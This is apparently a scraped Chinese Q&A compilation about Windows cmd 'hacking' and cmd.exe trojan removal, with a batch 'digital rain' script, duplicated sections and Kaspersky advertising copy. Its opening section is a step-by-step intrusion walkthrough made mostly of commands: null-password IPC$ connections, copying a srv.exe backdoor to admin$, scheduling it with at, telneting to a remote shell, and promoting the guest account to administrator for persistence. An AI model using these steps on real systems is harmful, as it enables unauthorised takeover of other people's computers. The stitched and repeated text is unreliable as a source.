黑客病毒代码cmd（黑客病毒代码复制）

跪求cmd黑客攻击指令和cmd电脑命令！悬赏大大滴有

一 相关命令

建立空连接:

net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

建立非空连接:

net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

映射默认共享:

net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘，其他盘类推)

如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

删除一个ipc$连接

net use \\IP\ipc$ /del

删除共享映射

net use c: /del 删除映射的c盘，其他盘类推

net use * /del 删除全部,会有提示要求按y确认

提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射网络驱动器,效果一样.

二 经典入侵模式

1. C:\net use \\127.0.0.1\IPC$ "" /user:"admintitrators"

这是用《流光》扫到的用户名是administrators，密码为"空"的IP地址(空口令?哇,运气好到家了)，如果是打算攻击的话，就可以用这样的命令来与127.0.0.1建立一个连接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名，输入administrators，命令即可成功完成。

2. C:\copy srv.exe \\127.0.0.1\admin$

先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。

3. C:\net time \\127.0.0.1

查查时间，发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00，命令成功完成。

4. C:\at \\127.0.0.1 11:05 srv.exe

用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）

5. C:\net time \\127.0.0.1

再查查到时间没有？如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05，那就准备开始下面的命令。

6. C:\telnet 127.0.0.1 99

这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。

虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打算建立一个Telnet服务！这就要用到ntlm了

7.C:\copy ntlm.exe \\127.0.0.1\admin$

用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。

8. C:\WINNT\system32ntlm

输入ntlm启动（这里的C:\WINNT\system32指的是对方计算机，运行ntlm其实是让这个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务！

9.Telnet 127.0.0.1，接着输入用户名与密码就进入对方了，操作就像在DOS上操作一样简单！(然后你想做什么?想做什么就做什么吧,哈哈)

为了以防万一,我们再把guest激活加到管理组

10. C:\net user guest /active:yes

将对方的Guest用户激活

11. C:\net user guest 1234

将Guest的密码改为1234,或者你要设定的密码

12. C:\net localgroup administrators guest /add

将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次我们可以用guest再次访问这台计算机).

ipc$经典入侵步骤：

1、net use \\ip\ipc$ 密码 /user:用户名

2、copy 文件名 \\ip\c$

3、net time \\ip

4、at \\ip 时间 命令

5、入侵成功，连接你的肉鸡

常用的网络命令

net user 查看用户列表

net user 用户名 密码 /add 添加用户

net user 用户名 密码 更改用户密码

net localgroup administrators 用户名 /add 添加用户到管理组

net user 用户名 /delete 删除用户

net user 用户名 查看用户的基本情况

net user 用户名 /active:no 禁用该用户

net user 用户名 /active:yes 启用该用户

net share 查看计算机IPC$共享资源

net share 共享名 查看该共享的情况

net share 共享名=路径 设置共享。例如 net share c$=c:

net share 共享名 /delete 删除IPC$共享

net stop lanmanserver 关闭ipc$和默认共享依赖的服务

net use 查看IPC$连接情况

net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接

net use \\ip\ipc$ /del 删除一个连接

net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘

net use z: /del

net time \\ip 查看远程计算机上的时间

copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上

net view ip 查看计算机上的共享资源

at 查看自己计算机上的计划作业

at \\ip 查看远程计算机上的计划作业

at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业

at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业

at \\ip all /delete 删除远程计算机上的全部计划作业

at \\ip time "echo 5 c:\t.txt" 在远程计算机上建立文本文件t.txt；

下面纯手打，上面是度娘给的

taskkill /im 进程名 停止运行

tasklisy 查看运行进程

ipconfig 查看本机IP

md 创建文件夹

rd 删除文件夹

echo off .txt|exit 添加文本

echo 内容 .txt 给文本添加内容

copy 复制文件

net user 用户名 密码/add 创建一个普通账号

net localgroup administrators 用户名 /add 把账户加入超级用户组

求CMD病毒最终解决方案！！！！

cmd.exe病毒进程清除2种方法

正确的查杀办法是:（该文章转自tiancxc）

1 重新启动计算机,按F8键 选择进入安全模式(非常重要,杀不干净与没进入安全模式有关).

2 用杀毒软件完全扫描查杀硬盘.

但我估计病毒文件不只这两个 杀毒软件很可能杀不干净. 所以还要进行下面的步骤

3.开始-运行-msconfig 回车, 在出现的"系统配置实用程序"中,调到"启动"选项卡,取消除杀毒软件的一切启动项,再点击"应用"(你可能要问:系统文件怎么办? 其实不必担心,系统文件是不会在这里添加启动项的,即使有的系统文件在这里的启动项被取消了,它也会自动恢复 这样做还有个好处,极大地节约系统资源,减少开机时间.谁愿意一开机,什么QQ\讯雷就一股脑的往外窜?).

4,还是在"系统配置实用程序"中,调到服务选项卡,勾选"隐藏所有 microsoft 服务",剩下的十有八九是病毒了(当然还有可能是杀毒软件之类),取消除杀毒软件的一切非microsoft 服务,再点确定.

5,如果在启动里,有你确信是病毒的文件,请记下它的位置,然后 打开命令提示符 (开始-运行-cmd 回车),用DEL命令删除它的病毒文件 比如c:\windows\1.exe,就输入命令del c:\windows\1.exe 回车.上面显示"找不到文件" 就证明成功删除了.

6,如果在服务里遇到确信的病毒,请打开控制面板-性能和维护-管理工具-服务,找到病毒的服务,打开它的属性,就能看到病毒的真面目,同样用DEL命令,删除它

(嫌麻烦可以不做 5,6两步.做完3,4两步后,病毒已经不再发作)

OK 基本完成了我们的工作.

你说的 在Windows下找不到 可能是它被设置为了隐藏.显示的办法是 打开"我的电脑",选择 工具-文件夹选项-查看

,选择"显示所有文件和文件夹",取消"隐藏受保护的操作系统文件" 这样所有的文件都能显示出来了.

如果你觉的还不保险,请继续完成下面两个步骤:

7,开始-程序-启动 删除里面的启动项

8,找到C;盘下的 autoexec.bat,删除它(不嫌麻烦就右键单击点编辑.清空里面的可疑内容,再保存).这个文件也可能被黑客利用,使病毒开机启动

说完了.以上内容(不包括第2条.我杀毒从来不用软件,用手~) 可以查杀各种病毒,即使杀毒软件查不出来的,我们也能查杀.这是通用的办法.熊猫烧香我也杀过,大体过程也是这样,但略麻烦一点,需要对付各个硬盘下的autorun.inf文件

所以说,学会我讲的这些,胜过花300块钱买套正版杀毒软件!

我有很丰富的反病毒经验,如果还有不明白,可以加QQ89525213,随便问(其他网友也欢提问)~ 我优点没有,就是喜欢帮助人.

另外的杀法：

（安全模式下(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)

打开sreng

“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”，

选中以下项目，点“删除服务”，再点“设置”，在弹出的框中点“否”：

Windows SystemDown / WindowsDown

双击我的电脑，工具，文件夹选项，查看，单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件（推荐）"前面的钩。在提示确定更改时，单击“是” 然后确定

然后删除C:\WINDOWS\system32\servet.exe）

开机CPU就是100％，查进程，原来是cmd.exe 占用了绝大部分的CPU。关闭cmd.exe后，CPU实用率恢复正常。但是再次开机的时候，CPU又是100％，cmd.exe 依然占用了绝大部分的CPU。

在运行里面输入1.exe 4.exe能出来说明这两个文件是在 windows 或 windows\system32 目录下.

1.装了ewido 查杀木马，查出了几个感染目标，已删除。但是今

天早上开机，CPU又是100％，cmd.exe 依然占用了绝大部分的CPU。

2.再装“木马清除专家2006”，查杀，结果没有发现木马。

3.查system 32 中的 CMD.EXE 大小，结果如下：

CMD.EXE 大小：459 KB (470,016 字节)

占用空间：460 KB (471,040 字节)

应该没有异常。

解决方法：

如果出现这种情况，很不幸，你99％是中了木马了。不过不妨继续验证一下，假定你的windows安装盘位于C:\，并且需要你在文件查看选项中打开查看隐藏文件的选项和显示所有文件扩展名的选项，则

查看你的c:\Program Files\Internet Explorer\PLUGINS\目录，应该会发现有new123.bak和new123.sys两个文件；

查看你的C:\Documents and Settings\Administrator\Local Settings\Temp\目录，应该会发现有MicroSoft.bat这个文件；你可以用记事本打开MicroSoft.bat文件，发现其中提到一个exe文件（具体名称会有不同），你也会在该目录下发现这个exe文件；

如果以上两步你并未发现相应文件，请将你的文件查看改为不隐藏已知文件后缀，并在系统盘内进行文件搜索，确认是否的确没有相关的文件。

木马描述

该木马主要是因为用户安装了嵌入木马程序的安装程序所致，这些安装程序极有可能是你在一些不知名的下载网站上下载的一些应用程序（比如qq的一些版本等）。该木马利用安装程序在没有提醒用户的情况下在IE的插件中安装了实为木马的IE插件。使得一般的杀毒和杀马程序无法识别。并且当你运行一些需要调用IE的一些程序时自动调用该木马插件，所以才出现“症状描述”中所描述的情况。

该木马的母体就是new123.sys，属于Trojan-PSW.Win32.Delf.mc，可能会偷取你的一些应用的帐号和密码。

木马清除

该木马可以很方便的手工清除，过程如下：

打开“任务管理器”，在“进程”中结束cmd.exe的运行，此时CPU占用率会明显下降；

进入C:\Documents and Settings\Administrator\Local Settings\Temp\目录，删除MicroSoft.bat这个文件中所提到的exe文件和该bat文件；（这一步不做也没有问题，但最好清除掉）

进入c:\Program Files\Internet Explorer\PLUGINS\目录，删除new123.bak文件，但此时你无法删除new123.sys文件，因为系统正在使用，你有两种方式处理new123.sys文件：

重启机器并进入安全模式对new123.sys进行删除；

当前状态虽无法删除该文件，但可更改new123.sys的文件名为new123.sysdel，并且重启机器（无需进入安全模式）后，再把new123.sysdel进行删除。

处理完后，如果“症状描述”中的情况消失，则说明清除成功。

XP系统里并没有cmd.exe的进程，cmd.exe是XP系统的命令提示符程序，可以执行一些在DOS下执行的应用程序，但是并不会随系统启动时运行，这有可能是个木马或者其他病毒程序，建议查杀

1、如果安装文件就在硬盘上，而且系统是从硬盘的安装目录装的，那先将这个安装目录改个名字

2、删除c:\winnt\system32\dllcache\cmd.exe，

3、然后再删除system32\cmd.exe

4、系统会提示说系统文件丢失要求插入光盘，忽略就行了

黑客帝国数字雨使用CMD命令

在电脑上新建一个文档，写入代码，运行，就可以实现黑客帝国里数字雨的效果。具体操作方法方法如下：

1、新建一个文本文档。

2、在文档内写入以下代码，并保持。

@echo off

title digitalrain

color 0b

setlocal ENABLEDELAYEDEXPANSION

for /l %%i in (0) do (

set "line="

for /l %%j in (1,1,80) do (

set /a Down%%j-=2

set "x=!Down%%j!"

if !x! LSS 0 (

set /a Arrow%%j=!random!%%3

set /a Down%%j=!random!%%15+10

)

set "x=!Arrow%%j!"

if "!x!" == "2" (

set "line=!line!!random:~-1! "

) else (set "line=!line! ")

)

set /p=!line!nul

)

3、点击文件中的另存为，在另存的时候把文档的后缀由txt改成bat。

4、更改完成后，点击保存。

5、找到另存的文件，以管理员的身份运行。

6、运行效果如下。

注意事项：

1、如果不能运行，请检查代码的标点符号是不是有中文符号，代码内所有符号必须是英文的。

2、网上有些带有网址的（http//...）的数字雨代码，请不要使用，实现该功能不需要进入其他网址，带有网址的代码疑似为病毒，例如某经验上提供的数字雨代码。

cmd.exe病毒！！！！！！！！！！

解决方法：

1，装上正版杀毒软件，并及时更新病毒库

2，安装防火墙

3，及时打上微软发布的最新安全补丁。

建议你安装卡巴斯基

卡巴斯基® 反病毒软件单机版为家庭用户的个人电脑提供超级病毒防护，它具有最尖端的反病毒技术，时刻监控一切病毒可能入侵的途径,同时该产品应用独有的iChecker® 技术，使处理速度比同类产品快 3 倍，而且它还应用第二代启发式病毒分析技术识别未知恶意程序代码，成功率约达 100％，目前卡巴斯基® 病毒数据库样本数已经超过 160000 万种并且拥有世界上最快的升级速度，每小时常规升级一次，以使系统随时保持抗御新病毒侵害的能力。

卡巴斯基®反病毒软件单机版可以基于 SMTP / POP3 协议来检测进出系统的邮件，可实时扫描各种邮件系统的全部接收和发出的邮件，检测其中的所有附件，包括压缩文件和文档、嵌入式OLE对象、及邮件体本身。它还新增加了个人防火墙模块，可有效保护运行 Windows 操作系统的 PC，探测对端口的扫描、封锁网络攻击并报告，系统可在隐形模式下工作，封锁所有来自外部网络的请求，使用户隐形和安全地在网上遨游。

卡巴斯基®反病毒软件可检测出 900 种以上的压缩格式文件和文档中的病毒，并可清除 ZIP、ARJ、CAB 和 RAR 文件中的病毒。我们提供 7×24 小时全天候技术服务。

Kaspersky Anti-Virus Personal

卡巴斯基全新中文单机版（Kaspersky for Personal）是俄罗斯著名数据安全厂商 Kaspersky Lab 专为我国个人用户度身定制的反病毒产品。产品采用第二代启发式代码分析技术、iChecker® 实时监控技术和独特的脚本病毒拦截技术等多种最尖端的反病毒技术，能够有效查杀超过 16 万种病毒，并可防范未知病毒。另外，该软件的界面简单、集中管理、提供多种定制方式，自动化程度高，而且几乎所有的功能都是在后台模式下运行，系统资源占有低。最具特色的是该产品每天两次更新病毒代码，更新文件只有 3-20 KB，对网络带宽的影响极其微小，能确保用户系统得到最为安全的保护，是个人用户的首选反病毒产品。

--------------------------------------------------------------------------------

软件特征：

◇ 卡巴斯基® 单机版反毒软件将时刻监控一切病毒可能入侵的途径， 如电子邮件、互联网、光盘、软盘等等。反病毒程序扫描所有病毒可能藏身的区域，包括系统内存、引导扇区、文件及电子邮件数据库。

◇ 高效的实时病毒防护

常驻内存的实时病毒扫描器，扫描文件的打开、创建和复制操作,程序集成在操作系统的最底层，可对文件完全控制，甚至可阻截最新技术制作的病毒的入侵。

◇ 不间断的邮件病毒过滤

实时自动检测所有进出的电子邮件，阻止病毒侵入您的电脑。卡巴斯基® 反病毒软件支持 MS Outlook、MS Outlook Express、Foxmail 等多种邮件数据库格式，可靠保护邮箱免受病毒侵扰。

◇ 保护存储数据

病毒扫描器可按需扫描所有本地和网络驱动器的存储内容。 您可以手动启动病毒扫描器，也可以通过控制中心计划启动。 通过对病毒扫描器和实时监视器的功能设置，对意外删除的染毒邮件，可恢复原电子邮件的内容。

◇ 病毒隔离

具备专门的隔离功能，将染毒和可疑文件存放在安全的地方。

◇ 独特的脚本病毒拦截器

脚本病毒拦截器为脚本病毒和脚本应用之间的过滤器，可在任何脚本程序运行之前检测是否有病毒。

◇ 防范未知病毒

采用了独特的第二代启发式代码分析技术，检测未知病毒。如它是全世界唯一不需更新病毒定义数据库而成功地阻截了爱虫及其所有变种病毒。

◇ 支持存档和压缩文件扫描

可识别 900 多种存档和压缩文件格式，自动检测其中的病毒，而且具有清除压缩文档中病毒的功能。

◇ 全自动的病毒防护

使用卡巴斯基集成的控制中心，您可灵活创建程序组件的计划启动、每日自动通过互联网的更新病毒代码、发现病毒时以电子邮件方式报警，还能通过允许或禁止修改反毒策略配置设置其他用户的访问权限。

◇ 每日通过互联网更新病毒定义

杀毒软件的更新频率越高，系统得到的保护就越可靠。卡巴斯基提供每日免费的病毒码更新服务！用户可通过内置的更新模块可轻松实现自动下载更新文件，我们提供 10 几个国内和国外的升级站点，也可访问公司网站手动下载。每天的更新文件只有3Kb ～ 20Kb。

◇ 通用的引导系统

救援盘制作一组Linux 内核的引导磁盘，并预安装了 Linux 版的卡巴斯基® 反病毒软件。 救援盘组在实现 "干净"启动的同时， 可恢复所有流行文件系统：FAT32(Windows95 / 98)、FAT(DOS)、 NTFS(Windows NT / 2000 / XP)、HPFS(OS/2)、EXT(Linux)。

--------------------------------------------------------------------------------

系统需求：

运行卡巴斯基® 反病毒软件单机版的系统需求：

1. 采用奔腾微处理器。

2. Windows 95/98/Me、Windows NT 4.0 Workstation(ServicePack 3以上补丁)、Windows 2000 Professional、Windows XP。

3. Windows NT 4.0 Workstation 或 Windows 2000 操作系统，使用本地管理员的身份登录。

4. Windows 95 / 98 / NT 4.0 Workstation 操作系统，IE 的版本 4.01 以上。

对于 Windows XP Home Edition 或者Windows XP Professional 操作系统，禁用“快速用户切换(Fast User Switching)”选项，否则某些防病毒功能会失效：用户无法更改设置；以及程序不能交互响应防病毒事件(如检测到病毒时，不会弹出对应的对话框询问用户如何处理染毒文件)。

5. 至少 32 Mb 内存。

6. 至少 25 Mb 剩余硬盘空间。

7. 建议显示器分辨率设置为 800×600，且系统时间设置正确。

将其它品牌的杀毒软件卸载。

Kaspersky® Anti-Virus Personal Pro

卡巴斯基® 单机专业版是专门针对单机的反病毒产品。它采用了 Kaspersky Lab 最新的反病毒技术，除了普通的杀毒功能外，卡巴斯基单机专业版 还拥有独特的功能组件，允许用户跟踪计算机上的所有数据变化，提供 MS Office 宏病毒保护。

卡巴斯基® 单机专业版融合了过去只向企业级产品用户提供的组件。现在这些组件也可以在单机版中使用了！它们采用集中控制的方法，以抵制各种病毒威胁，给用户提供最大程度的安全。

购买卡巴斯基® 单机专业版产品的用户，一年之内免费享受 Kaspersky Lab 提供的每天都更新的病毒数据库和 7X24 小时技术服务支持。

--------------------------------------------------------------------------------

软件特征：

◇ 100% 的保护 MS Office 文档保护

卡巴斯基® 单机专业版集成了 Office Guard 模块， 对 MS Office 中宏命令的使用进行监控，阻止任何可疑操作。Office Guard 的行为阻止器，100% 保证文档不受宏病毒危害，不给它们有任何破坏的机会。

◇ 数据完整性监控

在卡巴斯基® 单机专业版中集成了 Inspector，由它来负责跟踪您计算机中数据的变化。当发现了病毒行为如：对文件或者注册表的非授权修改，程序将恢复硬盘原始文件并删除有害代码。Inspector 采用 CRC 校验和算法与原始文件做比较，来查杀病毒，而无需更新病毒数据库做出判定。卡巴斯基® 单机专业版中的 Inspector 支持所有流行的执行文件格式，在保持了高水平可靠性的同时，提高了工作效率近 5 倍。

◇ 抵御未知病毒

在卡巴斯基® 单机专业版采用第二代启发式扫描技术。阻止未知病毒的侵入。使用该技术最有说服力的例子是 Kaspersky® 病毒数据库还未更新就成功地阻止了 "I LOVEYOU" 病毒及其所有变体病毒的攻击。

◇ 有效的实时保护

卡巴斯基® 单机专业版的组件Monitor常驻计算机内存，对所有文件运行、建立或者拷贝都实时进行病毒检查。与其它病毒产品检测方式不同的是，Monitor 与操作系统的最底层结合，这样该程序就可以完全监控所有的文件操作，甚至可以预防那些更狡猾的病毒。

◇ 电子邮件的反病毒过滤

卡巴斯基® 单机专业版实时对所有本地收发邮件实施检查，它支持不同的邮件数据格式（MS Outlook、 MS Outlook Express、 MS Exchange Client、 Eudora、 MS Mail、 Pegasus Mail、 Netscape Mail、 JSMail、 MIME），可靠地保护邮件数据库的安全，内置的 Mail Checker® 模块在不破坏邮件的基础上实现干净彻底删除病毒。

◇ 对电子邮件的所有内容都进行检查

卡巴斯基® 单机专业版不给病毒在电子邮件中任何藏身的机会。它自动检查收发邮件的所有部分，包括附件（压缩文件和被打包后的执行文件）、邮件中任意层次嵌入或植入的 OLE 对象及邮件正文。 保护磁盘数据的安全。

病毒扫描器提供了"根据需要"全方位检测所有本地和网络驱动器。您可以手动运行扫描器，也可以通过 Kaspersky® Anti-Virus Control Centre 制订计划任务去运行。

◇ 独特的 Script 病毒捕获系统

传统的反病毒监控器不能查杀计算机内存中的Script病毒，卡巴斯基® 单机专业版 独特的 Script 病毒检测器 Script Checker 完全解决了这个问题，Script Checker 以过滤器的形式集成到系统的 Script 程序和解释器之间。保证了所有要运行的 Script 在它们执行前都已被检查过。

◇ 全面查杀压缩文件

病毒经常隐藏在用压缩工具压缩过的文件里。很多杀毒软件对它们束手无策，卡巴斯基® 单机专业版完全解决了这个问题，它支持大量的压缩文件格式并自动对它们进行病毒检查。 隔离被感染对象

卡巴斯基® 单机专业版持隔离可疑和被感染文件功能，可以把可疑或被感染的文件转移到专门的隔离目录下，以便日后分析和恢复，完全消除了它们继续感染系统中其它文件的隐患。

◇ 完全的自动保护

您厌烦了每天下载新的反病毒数据库？是不是经常也会忘记了运行病毒监视器或是对您硬盘进行手动扫描？使用专门集成在卡巴斯基® 单机专业版中的 Kaspersky® Anti-Virus Control Center 模块，它可以让您建立灵活的时间表自动运行各组件，自动下载最新的病毒数据库，并将发现病毒攻击的警告消息以邮件形式自动发送给相关人员。 每天通过 Internet 下载最新的病毒数据库。

每天都有新病毒产生。频繁的升级病毒数据库，你的计算机的安全性才更有保障。使用卡巴斯基® 单机专业版的用户可以免费享受每天都更新的病毒数据库*。通过内置的 Updater 模块，您可以自动地或是按相关按钮，就可以通过 Internet 从 Kaspersky® Lab 的网站下载更新。而升级数据包的大小仅仅 3KB 到 20KB，让你不用担心带宽的消耗。

* 在定购的期限内

万能的启动系统

程序包含有内置的 Rescue Kit 模块，它是独一无二的启动系统，以便在计算机被病毒破坏时恢复整个系统。Rescue Kit 模块使用 Linux 操作系统核心组件制作成启动盘，有预先安装的 Kaspersky® for Linux 程序，这就可以进行"干净的启动"并帮助同时恢复流行的文件系统包括：FAT (DOS)、 FAT32 (Windows 95 / 98 / ME)、 NTFS (Windows NT / 2000 / XP)、PFS (OS / 2) EXT (Linux)。

Kaspersky Anti-Hacker

互联网可能是非常危险的地方。黑客们使用危险的恶意程序向您的计算机发动洪水般的攻击，全面控制您的计算机。您被各种间谍程序包围，这些间谍程序可偷窃密码、可取空银行账户、可监视您的计算机操作、可利用您的计算机大量发送垃圾邮件和DoS攻击、可将您的机要数据发给企图非法使用这些数据的人。所有这些，都可能是在您毫无觉察或未表赞同的情况下发生和实现的。

卡巴斯基® 反黒客软件，卡巴斯基实验室研发的个人防火墙，向您提供可靠的、可抗御所有上述威胁的防护。

--------------------------------------------------------------------------------

软件特征：

◇ 易用且适用

无需任何特殊的技能或专业知识，您就能安装和使用卡巴斯基® 反黑客软件。其适应性选项保证了易用性。本软件提供五个安全级别供您选择，对网络活动的限制从“全部通过”到“全部锁定”。卡巴斯基® 反黑客软件使用了全部最新的技术，可为您抗御最危险的黑客攻击。

◇ 有效抗御

卡巴斯基® 反黑客软件通过对进入和发出的数据流的连续过滤，可锁定绝大多数黑客的网络攻击、可检测出绝大多数类型的DoS攻击、及Ping of Death、Land、Helkern、Lovesan和SMBDie等攻击。此外，卡巴斯基®反黑客软件可检测到对端口做扫描的企图，这样的企图常常是流量攻击的前兆。在攻击发生时，系统会立即向用户发出通报。

◇ 跟踪网络行为

卡巴斯基® 反黑客软件包含针对最常用的邮件传输代理、网站浏览器、ICQ和其他实时信息程序的预设的规则。用户可设置针对互联网应用的安全规则，可在通用程序类目或个性化应用特殊设置的基础上规范网络应用行为。

◇ 包过滤

卡巴斯基® 反黑客软件检测所有数据包，防止未经批准的机要信息泄露。本软件可分析数据传输的所有方面，包括标题、使用的协议、端口、IP地址等等。数据包按照用户对相关信息定义的规则过滤，例如，用户可将数据包过滤规则设定为适用于所有应用或仅适用于某一应用。如果某一IP地址根据包过滤规则被锁定，它将无法启动任何应用。

◇ 自调整系统

卡巴斯基® 反黑客软件利用内置的自调整性能调整互联网应用的安全规则。当无预设置规则的事件发生时，用户可选择创建新规则，并将新规则添加到安全策略列表中，从而使安全规则的设置完全适应于用户的特殊需求。

C:\WINDOWS\system32\cmd.exe这是怎么

这是软件不正常卸载或中了木马病毒后的症状，处理如下：

a、开始——运行：msconfig回车——选择启动项——将Kbdhe 222.dll前面的勾子去掉——确定退出。（如无，可跳过，此时可不操作第四步）

b、开始——运行：regedit——编辑——查找：Kbdhe 222.dll——将找到的键值删除，按F3，继续查找、删除，直至全部删除。

c、Windows 清理助手V1.7.00.7.0206（纯绿色软件）清理。

d、重启后，在弹出对话框中进行勾选并确定。

e、用360安全卫士查杀恶意软件、木马、开启监控

扩展资料：

“木马”与计算机网络中常常要用到的远程控制软件有些相似，但由于远程控制软件是“善意”的控制，因此通常不具有隐蔽性；“木马”则完全相反，木马要达到的是“偷窃”性的远程控制，如果没有很强的隐蔽性的话，那就是“毫无价值”的。

它是指通过一段特定的程序（木马程序）来控制另一台计算机。木马通常有 两个可执行程序：一个是客户端，即控制端；另一个是服务端，即被控制端。植入被种者电脑的是“服务器”部分，而所谓的“黑客”正是利用“控制器”进入运行了“服务器”的电脑。

运行了木马程序的“服务器”以后，被种者的电脑就会有一个或几个端口被打开，使黑客可以利用这些打开的端口进入电脑系统，安全和个人隐私也就全无保障了！

木马的设计者为了防止木马被发现，而采用多种手段隐藏木马。木马的服务一旦运行并被控制端连接，其控制端将享有服务端的大部分操作权限，例如给计算机增加口令，浏览、移动、复制、删除文件，修改注册表，更改计算机配置等。

参考资料：百度百科-木马病毒

cmd.exe病毒

cmd.exe病毒进程清除2种方法

正确的查杀办法是:（该文章转自tiancxc）

1 重新启动计算机,按F8键 选择进入安全模式(非常重要,杀不干净与没进入安全模式有关).

2 用杀毒软件完全扫描查杀硬盘.

但我估计病毒文件不只这两个 杀毒软件很可能杀不干净. 所以还要进行下面的步骤

3.开始-运行-msconfig 回车, 在出现的"系统配置实用程序"中,调到"启动"选项卡,取消除杀毒软件的一切启动项,再点击"应用"(你可能要问:系统文件怎么办? 其实不必担心,系统文件是不会在这里添加启动项的,即使有的系统文件在这里的启动项被取消了,它也会自动恢复 这样做还有个好处,极大地节约系统资源,减少开机时间.谁愿意一开机,什么QQ\讯雷就一股脑的往外窜?).

4,还是在"系统配置实用程序"中,调到服务选项卡,勾选"隐藏所有 microsoft 服务",剩下的十有八九是病毒了(当然还有可能是杀毒软件之类),取消除杀毒软件的一切非microsoft 服务,再点确定.

5,如果在启动里,有你确信是病毒的文件,请记下它的位置,然后 打开命令提示符 (开始-运行-cmd 回车),用DEL命令删除它的病毒文件 比如c:\windows\1.exe,就输入命令del c:\windows\1.exe 回车.上面显示"找不到文件" 就证明成功删除了.

6,如果在服务里遇到确信的病毒,请打开控制面板-性能和维护-管理工具-服务,找到病毒的服务,打开它的属性,就能看到病毒的真面目,同样用DEL命令,删除它

(嫌麻烦可以不做 5,6两步.做完3,4两步后,病毒已经不再发作)

OK 基本完成了我们的工作.

你说的 在Windows下找不到 可能是它被设置为了隐藏.显示的办法是 打开"我的电脑",选择 工具-文件夹选项-查看

,选择"显示所有文件和文件夹",取消"隐藏受保护的操作系统文件" 这样所有的文件都能显示出来了.

如果你觉的还不保险,请继续完成下面两个步骤:

7,开始-程序-启动 删除里面的启动项

8,找到C;盘下的 autoexec.bat,删除它(不嫌麻烦就右键单击点编辑.清空里面的可疑内容,再保存).这个文件也可能被黑客利用,使病毒开机启动

说完了.以上内容(不包括第2条.我杀毒从来不用软件,用手~) 可以查杀各种病毒,即使杀毒软件查不出来的,我们也能查杀.这是通用的办法.熊猫烧香我也杀过,大体过程也是这样,但略麻烦一点,需要对付各个硬盘下的autorun.inf文件

所以说,学会我讲的这些,胜过花300块钱买套正版杀毒软件!

我有很丰富的反病毒经验,如果还有不明白,可以加QQ89525213,随便问(其他网友也欢提问)~ 我优点没有,就是喜欢帮助人.

另外的杀法：

（安全模式下(开机后不断 按F8键 然后出来一个高级菜单 选择第一项 安全模式 进入系统)

打开sreng

“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”，

选中以下项目，点“删除服务”，再点“设置”，在弹出的框中点“否”：

Windows SystemDown / WindowsDown

双击我的电脑，工具，文件夹选项，查看，单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件（推荐）"前面的钩。在提示确定更改时，单击“是” 然后确定

然后删除C:\WINDOWS\system32\servet.exe）

开机CPU就是100％，查进程，原来是cmd.exe 占用了绝大部分的CPU。关闭cmd.exe后，CPU实用率恢复正常。但是再次开机的时候，CPU又是100％，cmd.exe 依然占用了绝大部分的CPU。

在运行里面输入1.exe 4.exe能出来说明这两个文件是在 windows 或 windows\system32 目录下.

1.装了ewido 查杀木马，查出了几个感染目标，已删除。但是今

天早上开机，CPU又是100％，cmd.exe 依然占用了绝大部分的CPU。

2.再装“木马清除专家2006”，查杀，结果没有发现木马。

3.查system 32 中的 CMD.EXE 大小，结果如下：

CMD.EXE 大小：459 KB (470,016 字节)

占用空间：460 KB (471,040 字节)

应该没有异常。

解决方法：

如果出现这种情况，很不幸，你99％是中了木马了。不过不妨继续验证一下，假定你的windows安装盘位于C:\，并且需要你在文件查看选项中打开查看隐藏文件的选项和显示所有文件扩展名的选项，则

查看你的c:\Program Files\Internet Explorer\PLUGINS\目录，应该会发现有new123.bak和new123.sys两个文件；

查看你的C:\Documents and Settings\Administrator\Local Settings\Temp\目录，应该会发现有MicroSoft.bat这个文件；你可以用记事本打开MicroSoft.bat文件，发现其中提到一个exe文件（具体名称会有不同），你也会在该目录下发现这个exe文件；

如果以上两步你并未发现相应文件，请将你的文件查看改为不隐藏已知文件后缀，并在系统盘内进行文件搜索，确认是否的确没有相关的文件。

木马描述

该木马主要是因为用户安装了嵌入木马程序的安装程序所致，这些安装程序极有可能是你在一些不知名的下载网站上下载的一些应用程序（比如qq的一些版本等）。该木马利用安装程序在没有提醒用户的情况下在IE的插件中安装了实为木马的IE插件。使得一般的杀毒和杀马程序无法识别。并且当你运行一些需要调用IE的一些程序时自动调用该木马插件，所以才出现“症状描述”中所描述的情况。

该木马的母体就是new123.sys，属于Trojan-PSW.Win32.Delf.mc，可能会偷取你的一些应用的帐号和密码。

木马清除

该木马可以很方便的手工清除，过程如下：

打开“任务管理器”，在“进程”中结束cmd.exe的运行，此时CPU占用率会明显下降；

进入C:\Documents and Settings\Administrator\Local Settings\Temp\目录，删除MicroSoft.bat这个文件中所提到的exe文件和该bat文件；（这一步不做也没有问题，但最好清除掉）

